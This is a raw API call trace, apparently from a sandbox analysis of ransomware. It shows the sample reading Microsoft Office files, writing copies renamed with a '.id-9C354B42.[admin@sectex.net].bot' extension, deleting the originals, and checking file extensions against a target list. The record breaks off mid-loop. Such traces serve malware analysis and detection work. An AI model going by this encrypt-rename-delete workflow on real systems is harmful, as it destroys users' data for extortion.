	[0156.411] ReadFile (in: hFile=0x3dc, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x78c8, lpOverlapped=0x0) returned 1
	[0156.443] WriteFile (in: hFile=0x3d0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x78d0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x78d0, lpOverlapped=0x0) returned 1
	[0156.444] ReadFile (in: hFile=0x3dc, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.444] WriteFile (in: hFile=0x3d0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0156.444] SetEndOfFile (hFile=0x3d0) returned 1
	[0156.444] CloseHandle (hObject=0x3d0) returned 1
	[0156.445] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.445] SetEndOfFile (hFile=0x3dc) returned 1
	[0156.451] CloseHandle (hObject=0x3dc) returned 1
	[0156.451] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART11.BDR.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.461] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART11.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart11.bdr")) returned 1
	[0156.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART11.BDR") returned 62
	[0156.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART11.BDR") returned 62
	[0156.484] lstrlenW (lpString=".doc") returned 4
	[0156.484] lstrcmpiW (lpString1=".doc", lpString2=".BDR") returned 1
	[0156.484] lstrlenW (lpString=".docx") returned 5
	[0156.484] lstrcmpiW (lpString1=".docx", lpString2="1.BDR") returned -1
	[0156.484] lstrlenW (lpString=".pdf") returned 4
	[0156.493] lstrcmpiW (lpString1=".pdf", lpString2=".BDR") returned 1
	[0156.493] lstrlenW (lpString=".xls") returned 4
	[0156.493] lstrcmpiW (lpString1=".xls", lpString2=".BDR") returned 1
	[0156.493] lstrlenW (lpString=".xlsx") returned 5
	[0156.493] lstrcmpiW (lpString1=".xlsx", lpString2="1.BDR") returned -1
	[0156.493] lstrlenW (lpString=".ppt") returned 4
	[0156.493] lstrcmpiW (lpString1=".ppt", lpString2=".BDR") returned 1
	[0156.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART11.BDR") returned 62
	[0156.494] lstrlenW (lpString=".zip") returned 4
	[0156.494] lstrcmpiW (lpString1=".zip", lpString2=".BDR") returned 1
	[0156.494] lstrlenW (lpString=".rar") returned 4
	[0156.494] lstrcmpiW (lpString1=".rar", lpString2=".BDR") returned 1
	[0156.494] lstrlenW (lpString=".bz2") returned 4
	[0156.494] lstrcmpiW (lpString1=".bz2", lpString2=".BDR") returned 1
	[0156.494] lstrlenW (lpString=".7z") returned 3
	[0156.494] lstrcmpiW (lpString1=".7z", lpString2="BDR") returned -1
	[0156.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART11.BDR") returned 62
	[0156.494] lstrlenW (lpString=".dbf") returned 4
	[0156.494] lstrcmpiW (lpString1=".dbf", lpString2=".BDR") returned 1
	[0156.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART11.BDR") returned 62
	[0156.494] lstrlenW (lpString=".1cd") returned 4
	[0156.494] lstrcmpiW (lpString1=".1cd", lpString2=".BDR") returned -1
	[0156.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART11.BDR") returned 62
	[0156.494] lstrlenW (lpString=".jpg") returned 4
	[0156.494] lstrcmpiW (lpString1=".jpg", lpString2=".BDR") returned 1
	[0156.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART11.BDR") returned 62
	[0156.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART11.BDR") returned 62
	[0156.494] lstrlenW (lpString=".doc") returned 4
	[0156.494] lstrcmpiW (lpString1=".doc", lpString2=".BDR") returned 1
	[0156.494] lstrlenW (lpString=".docx") returned 5
	[0156.494] lstrcmpiW (lpString1=".docx", lpString2="1.BDR") returned -1
	[0156.494] lstrlenW (lpString=".pdf") returned 4
	[0156.494] lstrcmpiW (lpString1=".pdf", lpString2=".BDR") returned 1
	[0156.494] lstrlenW (lpString=".xls") returned 4
	[0156.494] lstrcmpiW (lpString1=".xls", lpString2=".BDR") returned 1
	[0156.494] lstrlenW (lpString=".xlsx") returned 5
	[0156.494] lstrcmpiW (lpString1=".xlsx", lpString2="1.BDR") returned -1
	[0156.494] lstrlenW (lpString=".ppt") returned 4
	[0156.495] lstrcmpiW (lpString1=".ppt", lpString2=".BDR") returned 1
	[0156.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART11.BDR") returned 62
	[0156.495] lstrlenW (lpString=".zip") returned 4
	[0156.495] lstrcmpiW (lpString1=".zip", lpString2=".BDR") returned 1
	[0156.495] lstrlenW (lpString=".rar") returned 4
	[0156.495] lstrcmpiW (lpString1=".rar", lpString2=".BDR") returned 1
	[0156.495] lstrlenW (lpString=".bz2") returned 4
	[0156.495] lstrcmpiW (lpString1=".bz2", lpString2=".BDR") returned 1
	[0156.495] lstrlenW (lpString=".7z") returned 3
	[0156.495] lstrcmpiW (lpString1=".7z", lpString2="BDR") returned -1
	[0156.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART11.BDR") returned 62
	[0156.495] lstrlenW (lpString=".dbf") returned 4
	[0156.495] lstrcmpiW (lpString1=".dbf", lpString2=".BDR") returned 1
	[0156.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART11.BDR") returned 62
	[0156.495] lstrlenW (lpString=".1cd") returned 4
	[0156.495] lstrcmpiW (lpString1=".1cd", lpString2=".BDR") returned -1
	[0156.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART11.BDR") returned 62
	[0156.495] lstrlenW (lpString=".jpg") returned 4
	[0156.495] lstrcmpiW (lpString1=".jpg", lpString2=".BDR") returned 1
	[0156.495] lstrcmpiW (lpString1=".BDR", lpString2=".bot") returned -1
	[0156.495] lstrlenW (lpString="MSART15.BDR") returned 11
	[0156.495] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART15.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart15.bdr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0156.496] GetFileSizeEx (in: hFile=0x3e0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=27412) returned 1
	[0156.496] CloseHandle (hObject=0x3e0) returned 1
	[0156.496] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART15.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart15.bdr")) returned 0x20
	[0156.496] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART15.BDR.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart15.bdr.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.496] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART15.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart15.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0156.496] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.496] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.497] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART15.BDR.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart15.bdr.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0156.497] GetLastError () returned 0x0
	[0156.497] ReadFile (in: hFile=0x3e0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x6b14, lpOverlapped=0x0) returned 1
	[0156.505] WriteFile (in: hFile=0x3c0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x6b20, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x6b20, lpOverlapped=0x0) returned 1
	[0156.506] ReadFile (in: hFile=0x3e0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.506] WriteFile (in: hFile=0x3c0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0156.507] SetEndOfFile (hFile=0x3c0) returned 1
	[0156.507] CloseHandle (hObject=0x3c0) returned 1
	[0156.507] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.507] SetEndOfFile (hFile=0x3e0) returned 1
	[0156.509] CloseHandle (hObject=0x3e0) returned 1
	[0156.509] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART15.BDR.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.538] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART15.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart15.bdr")) returned 1
	[0156.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART15.BDR") returned 62
	[0156.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART15.BDR") returned 62
	[0156.539] lstrlenW (lpString=".doc") returned 4
	[0156.539] lstrcmpiW (lpString1=".doc", lpString2=".BDR") returned 1
	[0156.539] lstrlenW (lpString=".docx") returned 5
	[0156.539] lstrcmpiW (lpString1=".docx", lpString2="5.BDR") returned -1
	[0156.539] lstrlenW (lpString=".pdf") returned 4
	[0156.539] lstrcmpiW (lpString1=".pdf", lpString2=".BDR") returned 1
	[0156.539] lstrlenW (lpString=".xls") returned 4
	[0156.539] lstrcmpiW (lpString1=".xls", lpString2=".BDR") returned 1
	[0156.539] lstrlenW (lpString=".xlsx") returned 5
	[0156.539] lstrcmpiW (lpString1=".xlsx", lpString2="5.BDR") returned -1
	[0156.539] lstrlenW (lpString=".ppt") returned 4
	[0156.539] lstrcmpiW (lpString1=".ppt", lpString2=".BDR") returned 1
	[0156.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART15.BDR") returned 62
	[0156.540] lstrlenW (lpString=".zip") returned 4
	[0156.540] lstrcmpiW (lpString1=".zip", lpString2=".BDR") returned 1
	[0156.540] lstrlenW (lpString=".rar") returned 4
	[0156.540] lstrcmpiW (lpString1=".rar", lpString2=".BDR") returned 1
	[0156.540] lstrlenW (lpString=".bz2") returned 4
	[0156.540] lstrcmpiW (lpString1=".bz2", lpString2=".BDR") returned 1
	[0156.540] lstrlenW (lpString=".7z") returned 3
	[0156.540] lstrcmpiW (lpString1=".7z", lpString2="BDR") returned -1
	[0156.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART15.BDR") returned 62
	[0156.540] lstrlenW (lpString=".dbf") returned 4
	[0156.540] lstrcmpiW (lpString1=".dbf", lpString2=".BDR") returned 1
	[0156.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART15.BDR") returned 62
	[0156.540] lstrlenW (lpString=".1cd") returned 4
	[0156.540] lstrcmpiW (lpString1=".1cd", lpString2=".BDR") returned -1
	[0156.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART15.BDR") returned 62
	[0156.540] lstrlenW (lpString=".jpg") returned 4
	[0156.540] lstrcmpiW (lpString1=".jpg", lpString2=".BDR") returned 1
	[0156.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART15.BDR") returned 62
	[0156.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART15.BDR") returned 62
	[0156.540] lstrlenW (lpString=".doc") returned 4
	[0156.540] lstrcmpiW (lpString1=".doc", lpString2=".BDR") returned 1
	[0156.540] lstrlenW (lpString=".docx") returned 5
	[0156.540] lstrcmpiW (lpString1=".docx", lpString2="5.BDR") returned -1
	[0156.540] lstrlenW (lpString=".pdf") returned 4
	[0156.540] lstrcmpiW (lpString1=".pdf", lpString2=".BDR") returned 1
	[0156.540] lstrlenW (lpString=".xls") returned 4
	[0156.540] lstrcmpiW (lpString1=".xls", lpString2=".BDR") returned 1
	[0156.540] lstrlenW (lpString=".xlsx") returned 5
	[0156.540] lstrcmpiW (lpString1=".xlsx", lpString2="5.BDR") returned -1
	[0156.540] lstrlenW (lpString=".ppt") returned 4
	[0156.540] lstrcmpiW (lpString1=".ppt", lpString2=".BDR") returned 1
	[0156.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART15.BDR") returned 62
	[0156.541] lstrlenW (lpString=".zip") returned 4
	[0156.541] lstrcmpiW (lpString1=".zip", lpString2=".BDR") returned 1
	[0156.541] lstrlenW (lpString=".rar") returned 4
	[0156.541] lstrcmpiW (lpString1=".rar", lpString2=".BDR") returned 1
	[0156.541] lstrlenW (lpString=".bz2") returned 4
	[0156.541] lstrcmpiW (lpString1=".bz2", lpString2=".BDR") returned 1
	[0156.541] lstrlenW (lpString=".7z") returned 3
	[0156.541] lstrcmpiW (lpString1=".7z", lpString2="BDR") returned -1
	[0156.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART15.BDR") returned 62
	[0156.541] lstrlenW (lpString=".dbf") returned 4
	[0156.541] lstrcmpiW (lpString1=".dbf", lpString2=".BDR") returned 1
	[0156.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART15.BDR") returned 62
	[0156.541] lstrlenW (lpString=".1cd") returned 4
	[0156.541] lstrcmpiW (lpString1=".1cd", lpString2=".BDR") returned -1
	[0156.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART15.BDR") returned 62
	[0156.541] lstrlenW (lpString=".jpg") returned 4
	[0156.541] lstrcmpiW (lpString1=".jpg", lpString2=".BDR") returned 1
	[0156.541] lstrcmpiW (lpString1=".BDR", lpString2=".bot") returned -1
	[0156.541] lstrlenW (lpString="MSART4.BDR") returned 10
	[0156.541] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART4.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart4.bdr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0156.550] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=14594) returned 1
	[0156.558] CloseHandle (hObject=0x3dc) returned 1
	[0156.560] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART4.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart4.bdr")) returned 0x20
	[0156.565] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART4.BDR.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart4.bdr.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.570] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART4.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart4.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0156.695] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.696] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.696] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART4.BDR.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart4.bdr.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0156.699] GetLastError () returned 0x0
	[0156.699] ReadFile (in: hFile=0x268, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x3902, lpOverlapped=0x0) returned 1
	[0156.714] WriteFile (in: hFile=0x388, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x3910, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x3910, lpOverlapped=0x0) returned 1
	[0156.715] ReadFile (in: hFile=0x268, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.715] WriteFile (in: hFile=0x388, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0156.715] SetEndOfFile (hFile=0x388) returned 1
	[0156.715] CloseHandle (hObject=0x388) returned 1
	[0156.715] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.715] SetEndOfFile (hFile=0x268) returned 1
	[0156.717] CloseHandle (hObject=0x268) returned 1
	[0156.718] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART4.BDR.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.857] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART4.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart4.bdr")) returned 1
	[0156.858] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART4.BDR") returned 61
	[0156.858] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART4.BDR") returned 61
	[0156.858] lstrlenW (lpString=".doc") returned 4
	[0156.858] lstrcmpiW (lpString1=".doc", lpString2=".BDR") returned 1
	[0156.858] lstrlenW (lpString=".docx") returned 5
	[0156.858] lstrcmpiW (lpString1=".docx", lpString2="4.BDR") returned -1
	[0156.858] lstrlenW (lpString=".pdf") returned 4
	[0156.858] lstrcmpiW (lpString1=".pdf", lpString2=".BDR") returned 1
	[0156.858] lstrlenW (lpString=".xls") returned 4
	[0156.858] lstrcmpiW (lpString1=".xls", lpString2=".BDR") returned 1
	[0156.858] lstrlenW (lpString=".xlsx") returned 5
	[0156.858] lstrcmpiW (lpString1=".xlsx", lpString2="4.BDR") returned -1
	[0156.858] lstrlenW (lpString=".ppt") returned 4
	[0156.858] lstrcmpiW (lpString1=".ppt", lpString2=".BDR") returned 1
	[0156.858] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART4.BDR") returned 61
	[0156.858] lstrlenW (lpString=".zip") returned 4
	[0156.859] lstrcmpiW (lpString1=".zip", lpString2=".BDR") returned 1
	[0156.859] lstrlenW (lpString=".rar") returned 4
	[0156.859] lstrcmpiW (lpString1=".rar", lpString2=".BDR") returned 1
	[0156.859] lstrlenW (lpString=".bz2") returned 4
	[0156.859] lstrcmpiW (lpString1=".bz2", lpString2=".BDR") returned 1
	[0156.859] lstrlenW (lpString=".7z") returned 3
	[0156.859] lstrcmpiW (lpString1=".7z", lpString2="BDR") returned -1
	[0156.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART4.BDR") returned 61
	[0156.859] lstrlenW (lpString=".dbf") returned 4
	[0156.859] lstrcmpiW (lpString1=".dbf", lpString2=".BDR") returned 1
	[0156.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART4.BDR") returned 61
	[0156.859] lstrlenW (lpString=".1cd") returned 4
	[0156.859] lstrcmpiW (lpString1=".1cd", lpString2=".BDR") returned -1
	[0156.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART4.BDR") returned 61
	[0156.859] lstrlenW (lpString=".jpg") returned 4
	[0156.859] lstrcmpiW (lpString1=".jpg", lpString2=".BDR") returned 1
	[0156.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART4.BDR") returned 61
	[0156.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART4.BDR") returned 61
	[0156.859] lstrlenW (lpString=".doc") returned 4
	[0156.859] lstrcmpiW (lpString1=".doc", lpString2=".BDR") returned 1
	[0156.859] lstrlenW (lpString=".docx") returned 5
	[0156.859] lstrcmpiW (lpString1=".docx", lpString2="4.BDR") returned -1
	[0156.859] lstrlenW (lpString=".pdf") returned 4
	[0156.859] lstrcmpiW (lpString1=".pdf", lpString2=".BDR") returned 1
	[0156.859] lstrlenW (lpString=".xls") returned 4
	[0156.859] lstrcmpiW (lpString1=".xls", lpString2=".BDR") returned 1
	[0156.859] lstrlenW (lpString=".xlsx") returned 5
	[0156.859] lstrcmpiW (lpString1=".xlsx", lpString2="4.BDR") returned -1
	[0156.859] lstrlenW (lpString=".ppt") returned 4
	[0156.859] lstrcmpiW (lpString1=".ppt", lpString2=".BDR") returned 1
	[0156.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART4.BDR") returned 61
	[0156.860] lstrlenW (lpString=".zip") returned 4
	[0156.860] lstrcmpiW (lpString1=".zip", lpString2=".BDR") returned 1
	[0156.860] lstrlenW (lpString=".rar") returned 4
	[0156.860] lstrcmpiW (lpString1=".rar", lpString2=".BDR") returned 1
	[0156.860] lstrlenW (lpString=".bz2") returned 4
	[0156.860] lstrcmpiW (lpString1=".bz2", lpString2=".BDR") returned 1
	[0156.860] lstrlenW (lpString=".7z") returned 3
	[0156.860] lstrcmpiW (lpString1=".7z", lpString2="BDR") returned -1
	[0156.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART4.BDR") returned 61
	[0156.860] lstrlenW (lpString=".dbf") returned 4
	[0156.860] lstrcmpiW (lpString1=".dbf", lpString2=".BDR") returned 1
	[0156.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART4.BDR") returned 61
	[0156.860] lstrlenW (lpString=".1cd") returned 4
	[0156.860] lstrcmpiW (lpString1=".1cd", lpString2=".BDR") returned -1
	[0156.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART4.BDR") returned 61
	[0156.860] lstrlenW (lpString=".jpg") returned 4
	[0156.860] lstrcmpiW (lpString1=".jpg", lpString2=".BDR") returned 1
	[0156.860] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0156.860] lstrlenW (lpString="CODEEDIT.DLL") returned 12
	[0156.860] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CODEEDIT.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\codeedit.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0156.863] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=53128) returned 1
	[0156.863] CloseHandle (hObject=0x388) returned 1
	[0156.863] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CODEEDIT.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\codeedit.dll")) returned 0x20
	[0156.863] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CODEEDIT.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\codeedit.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.863] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CODEEDIT.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\codeedit.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0156.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CODEEDIT.DLL") returned 55
	[0156.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CODEEDIT.DLL") returned 55
	[0156.863] lstrlenW (lpString=".doc") returned 4
	[0156.864] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0156.864] lstrlenW (lpString=".docx") returned 5
	[0156.864] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1
	[0156.864] lstrlenW (lpString=".pdf") returned 4
	[0156.864] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0156.864] lstrlenW (lpString=".xls") returned 4
	[0156.864] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0156.864] lstrlenW (lpString=".xlsx") returned 5
	[0156.864] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1
	[0156.864] lstrlenW (lpString=".ppt") returned 4
	[0156.864] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0156.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CODEEDIT.DLL") returned 55
	[0156.864] lstrlenW (lpString=".zip") returned 4
	[0156.864] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0156.864] lstrlenW (lpString=".rar") returned 4
	[0156.864] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0156.864] lstrlenW (lpString=".bz2") returned 4
	[0156.864] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0156.864] lstrlenW (lpString=".7z") returned 3
	[0156.864] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0156.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CODEEDIT.DLL") returned 55
	[0156.864] lstrlenW (lpString=".dbf") returned 4
